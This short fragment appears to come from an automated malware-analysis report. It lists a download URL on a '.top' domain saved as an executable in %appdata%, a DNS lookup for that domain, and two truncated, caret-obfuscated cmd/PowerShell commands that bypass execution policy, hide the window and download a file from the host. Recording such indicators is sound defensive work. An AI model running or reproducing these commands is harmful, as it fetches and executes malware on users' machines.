Technical Information
- http://newyeargoka.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OwERs^h^EL^L.eXe -^e^x^EC^u^Ti^O^NPolICy^ By^Pa^sS -NOPr^O^f^iL^e^ -wiNDowStY^l^E ^H^iDD^E^n ^(N^ew^-OBj^ECT sySt^EM^.n^eT.Webcl^Ient^)^.^doWN^loadF^i^l^E^(^'http://newye...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "P^OwERs^h^EL^L.eXe -^e^x^EC^u^Ti^O^NPolICy^ By^Pa^sS -NOPr^O^f^iL^e^ -wiNDowStY^l^E ^H^iDD^E^n ^(N^ew^-OBj^ECT sySt^EM^.n^eT.Webcl^Ient^)^.^doWN^loadF^i^l^E^(^'http://newye...' (with hidden window)